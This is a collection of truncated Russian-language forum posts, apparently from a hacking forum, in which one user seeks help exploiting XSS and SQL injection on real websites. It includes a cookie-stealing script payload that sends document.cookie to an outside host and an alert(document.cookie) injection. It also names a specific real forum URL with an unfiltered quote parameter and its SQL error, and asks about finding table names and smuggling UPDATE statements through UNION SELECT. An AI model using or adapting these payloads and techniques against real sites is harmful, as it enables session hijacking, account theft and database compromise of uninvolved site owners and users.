Separate names with a comma.
А, все, доперло - "+" = " "... как от этого избавиться? :-) & нельзя использовать, сразу говорю. В виде "%ХХ" как "+" выглядит? UPD: усе,...
r=<img%20src=http://antichat.ru/cgi-bin/s.jpg?><script>img%20=%20new%20Image();%20img.src%20=%20document.images[19].src+document.cookie;</script>...
Гм, аналогичная ситуация - пассивный Xss, фильтруется только ", '... Что можно сделать нехорошего без кавычек? :-) Т.е. просто картинку вставить...
Не, лучше Б. СТРАУСТРАП - ВВЕДЕНИЕ В ЯЗЫК СИ++
Qwazar gif, к примеру имеет пометки в своем коде о том, что это гиф... Первые байты - 47 49 46 38 37 - подчеркивание Гифа. возможно где-то еще...
можно еще в юнион селекте попробовать отселектить as page, хотя не знаю поможет ли UPD:.. хотя вроде я чушь написал :-) не пейдж же...
гм, какой нужно выполнить запрос, какой результат нужно получить? Может быть просто нигде нет вывода в хтмл коде получившейся переменной....
да блин... тут не только в инзертах дыры! :-) Я где-то в селекте видел... А не мог бы подсказать ссылку или описать методику поиска названий...
дак вот: есть ли методика унзнавания имен таблиц или т.п.?
Can't get id of forum: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax...
http://www.63.ru/forum/forum.php?cmd=supergrass&id=' Выдает ошибку... Ну ясно - не отсеивается ' в запросах... что-нить глубже получится у...
гммм... дело в том, что ХСС видимо пассивный, при гет запросе к примеру могу вставить: patt="><script>alert(document.cookie)</script> Вот......
Нашел XSS уязвимость... в запросе .cgi файла... могу в хтмл-код внедрить любой другой хтмл код :-) Что дальше сделать можно? К примеру как...
А как использовать Инъекцию, если method='POST'... Гет - вписываешь значения в строку браузера... А пост как использовать
соотв.. через юнион селект я имею в виду... вдруг можн и апдейт подсунуть? база Mysql
